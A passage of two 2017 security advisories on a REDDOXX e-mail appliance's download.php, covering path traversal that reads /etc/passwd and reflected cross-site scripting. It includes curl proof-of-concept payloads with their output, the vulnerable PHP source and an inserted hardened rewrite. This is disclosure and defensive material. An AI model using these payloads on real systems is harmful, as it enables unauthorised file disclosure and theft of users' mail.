can be specified, as there are no protections against directory
traversal in place. This path also passes the second check imposed by
the function file_exists(). Having bypassed both checks, attackers are
now able to reach the readfile() function and download arbitrary files.

Since no authentication checks are in place, the disclosure of arbitrary
files is also possible for unauthenticated attackers.

The same functionality is vulnerable to a cross-site scripting
vulnerability as described in rt-sa-2017-003 [2].


Proof of Concept
================

The following curl command-line can be used to trigger the vulnerability:


$ curl --silent 'http://www.example.com/download.php?file='\
'/opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
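
The following is an added example and not code from the REDDOXX appliance
or from the advisory: a hardened stand-in for download.php that replaces
the substring test with a check on the canonical path, so the traversal
described above (and the related XSS in rt-sa-2017-003, where the raw
"file" value is echoed into an HTML error message) no longer works. The
session directories are the ones named in the advisory; the
isAuthenticated() function and the $_SESSION['user'] key are hypothetical
placeholders for the appliance's real session handling.

```php
<?php
// Added example, not REDDOXX code: hardened download.php.
// Base directories are taken from the advisory; isAuthenticated() is a
// hypothetical hook standing in for the appliance's real session check.

const SESSION_DIRS = [
    '/opt/reddoxx/wi/Sessions',
    '/opt/reddoxx/data/temp/Sessions',
];

/**
 * Canonicalize $requested and return it only if it is a regular file
 * inside one of $baseDirs; otherwise return null.
 *
 * realpath() resolves "..", symlinks and repeated slashes, so the prefix
 * test runs on the canonical path rather than on attacker-supplied text:
 * /opt/reddoxx/data/temp/Sessions/../../../../../etc/passwd resolves to
 * /etc/passwd and is rejected, whereas the original strpos() test let it pass.
 */
function resolveDownloadPath(string $requested, array $baseDirs): ?string
{
    // realpath() throws a ValueError on NUL bytes in PHP 8; reject them first.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    $real = realpath($requested);
    if ($real === false || !is_file($real)) {
        return null; // missing, unreadable, or not a regular file
    }

    foreach ($baseDirs as $dir) {
        $base = realpath($dir);
        if ($base === false) {
            continue; // base directory absent on this host
        }
        // Compare against "<base>/" so that a sibling directory such as
        // /opt/reddoxx/wi/Sessions2/ does not pass as a prefix match.
        $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $prefix, strlen($prefix)) === 0) {
            return $real;
        }
    }
    return null;
}

/**
 * Send an HTML error page. The attacker-controlled value goes through
 * htmlspecialchars(), so markup in the "file" parameter is rendered as
 * text instead of being executed by the browser.
 */
function sendError(int $status, string $message, string $untrusted): void
{
    http_response_code($status);
    header('Content-Type: text/html; charset=UTF-8');
    echo '<p>' . htmlspecialchars($message . $untrusted, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
    exit;
}

/** Hypothetical hook: the advisory notes download.php had no authentication at all. */
function isAuthenticated(): bool
{
    return isset($_SESSION['user']);
}

session_start();
if (!isAuthenticated()) {
    sendError(401, 'Authentication required', '');
}

// Accept only a scalar string; "file[]=x" would otherwise arrive as an array.
$raw = $_GET['file'] ?? '';
$fileName = is_string($raw) ? $raw : '';

$path = resolveDownloadPath($fileName, SESSION_DIRS);
if ($path === null) {
    // One generic message so the response does not reveal whether a path exists.
    sendError(404, 'File not available: ', $fileName);
}

// Only the canonical basename reaches the header, with quotes and CR/LF removed.
$downloadName = str_replace(['"', "\r", "\n"], '', basename($path));
header('Content-Description: File Transfer');
header('Content-Disposition: attachment; filename="' . $downloadName . '"');
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The important design choice is the order of operations: authenticate
first, canonicalize second, and only then compare against the allowed base
directories. Testing the raw input for a substring, as the original script
does, cannot be made safe by adding more substrings, because the check
never sees the path the kernel will actually open.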

[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
Advisory: Cross-Site Scripting in REDDOXX Appliance

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the REDDOXX appliance software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.


Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-003
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clients’ requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)


More Details
============

The REDDOXX appliance [0] contains a PHP script called download.php. It
is available at http://www.example.com/download.php in normal
installations and resides at /opt/reddoxx/local/htdocs/download.php on
the local filesystem of the appliance. Through the ISO provided on
the vendor's homepage [1], it was possible to analyze this file and any
other file in a typical REDDOXX appliance installation.

The file contains the following source code (shortened to the relevant
sections):


<?php
 // The opening lines of the script were lost in extraction; they are
 // reconstructed here from the description below (the URL parameter
 // "file" is stored in the variable $fileName).
 $fileName = $_GET['file'];
 if ($fileName != '') {
   $file = $fileName;
   $fileID = basename($fileName);
 }

 // Currently we only allow downloads from session directories
 if ((strpos($file, '/opt/reddoxx/wi/Sessions/') === false) &&
     (strpos($file, '/opt/reddoxx/data/temp/Sessions/') === false)) {
   die('File is not in session directory: ' . $file);
 }

 if(!file_exists($file))
 {
   // File doesn't exist, output error
   die('File not found: ' . $file);
 }
 else
 {
   // [...]
 }
?>


The script expects a URL parameter called "file" and stores its value in
the variable $fileName. The value of this variable is then copied to the
variable $file, which undergoes two different checks: First, the
function strpos() is used to check whether a certain substring is
contained in the value of the variable. The second check uses the function
file_exists() to determine whether the file specified in the variable is
present in the filesystem. If either of these checks fails, the value of
the variable $file, which is controlled by the attacker via the URL
parameter, is embedded unencoded into an error message which is returned
to the user with a content-type of "text/html".


Proof of Concept
================

The following curl command-lines can be used to trigger the
vulnerability at both locations of the PHP script:


$ curl --include 'http://www.example.com/download.php?file='\
'<script>alert("RedTeam%20Pentesting")</script>'
HTTP/1.1 200 OK
[...]
Content-Length: 78
Content-Type: text/html

File is not in session directory: <script>alert("RedTeam Pentesting")</script>



$ curl --include 'http://www.example.com/download.php?file='\
'/opt/reddoxx/data/temp/Sessions/<script>alert("RedTeam%20Pentesting")</script>'
HTTP/1.1 200 OK
[...]
Content-Length: 92
Content-Type: text/html

File not found: /opt/reddoxx/data/temp/Sessions/<script>alert("RedTeam Pentesting")</script>


In both cases, the response containing the error messages is returned
with the Content-Type header set to "text/html", causing the browser
to execute the injected JavaScript code.

The same functionality is vulnerable to an arbitrary file disclosure
attack as described in rt-sa-2017-004 [2] and indicated by the second
curl command.


Workaround
==========

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=============

The vulnerability allows attackers to extract user's emails from the
REDDOXX appliance. However, as a session ID stored in the DOM of the
website is used for authentication rather than cookies, the attacked
user must first log in. Once attackers have access to the user's session
ID, the victim's browser can be instrumented to retrieve emails stored
in the system and send them to a system under the attacker's control.
The vulnerability is therefore rated as a high risk.


Timeline
========

2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability